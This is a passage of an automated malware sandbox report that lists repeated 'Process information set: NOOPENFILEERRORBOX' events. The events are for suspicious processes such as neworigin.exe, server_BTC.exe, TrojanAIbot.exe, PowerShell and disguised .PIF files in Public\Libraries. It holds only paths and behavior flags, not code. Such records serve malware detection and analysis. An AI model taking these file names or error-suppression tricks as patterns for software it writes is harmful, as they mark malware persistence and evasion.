                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
